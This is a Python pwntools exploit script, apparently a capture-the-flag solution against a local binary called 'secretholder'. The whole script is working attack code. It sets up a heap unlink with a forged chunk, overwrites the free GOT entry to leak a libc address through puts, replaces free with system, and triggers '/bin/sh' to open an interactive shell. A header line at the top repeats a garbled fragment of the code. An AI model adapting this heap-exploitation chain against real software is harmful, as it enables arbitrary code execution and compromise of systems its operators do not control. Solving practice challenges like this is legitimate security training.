from pwn import *def keep(idx, data): p.recvuntil('3. Renew secret') p.sen

1. from pwn import *
2.  
3. def keep(idx, data):
4. p.recvuntil('3. Renew secret')
5. p.sendline('1')
6. p.recvuntil('3. Huge secret')
7. p.sendline(str(idx))
8. p.recvline()
9. p.sendline(data)
10.  
11. def wipe(idx):
12. p.recvuntil('3. Renew secret')
13. p.sendline('2')
14. p.recvuntil('3. Huge secret')
15. p.sendline(str(idx))
16.  
17. def renew(idx, data):
18. p.recvuntil('3. Renew secret')
19. p.sendline('3')
20. p.recvuntil('3. Huge secret')
21. p.sendline(str(idx))
22. p.recvline()
23. p.send(data)
24.  
25. if __name__ == '__main__':
26. p = process("./secretholder")
27. context.log_level='debug'
28. addr = 0x6020a8
29. free_got = 0x602018
30. puts_plt = 0x4006c0
31.  
32. keep(1,'AAAA')
33. keep(2,'AAAA')
34. keep(3,'AAAA')
35.  
36. wipe(1)
37. wipe(2)
38. wipe(3)
39.  
40. keep(3,'AAAA')
41.  
42. wipe(1)
43.  
44. keep(1,'AAAA')
45. keep(2,'AAAA')
46.  
47. fake_chunk = p64(0) + p64(0x21) + p64(addr - 0x18) + p64(addr - 0x10)
48.  
49. junk = p64(0x20) + p64(0x90) + "A"*128 + p64(0x90) + p64(0x91) + "A"*128 + p64(0x90) + p64(0x91)
50.  
51. renew(3,fake_chunk + junk)
52. sleep(0.2)
53. wipe(2)
54.  
55. renew(3, p64(0)*3 + p64(free_got - 0x10))
56.  
57. renew(3, p64(0)*2 + p64(puts_plt))
58.  
59. renew(1,'/bin/sh;' + "A"*8)
60.  
61. wipe(1)
62.  
63. p.recvuntil("/bin/sh;" + "A"*8)
64. leak = u64(p.recv(6)[0:].ljust(8,'\x00'))
65. print "[+] Leak : 0x%x" % leak
66. system = leak - 0x3be7b8 + 0x45390 - 0x63c0
67.  
68. renew(3, p64(0)*2 + p64(system))
69.  
70. wipe(1)
71.  
72. p.interactive()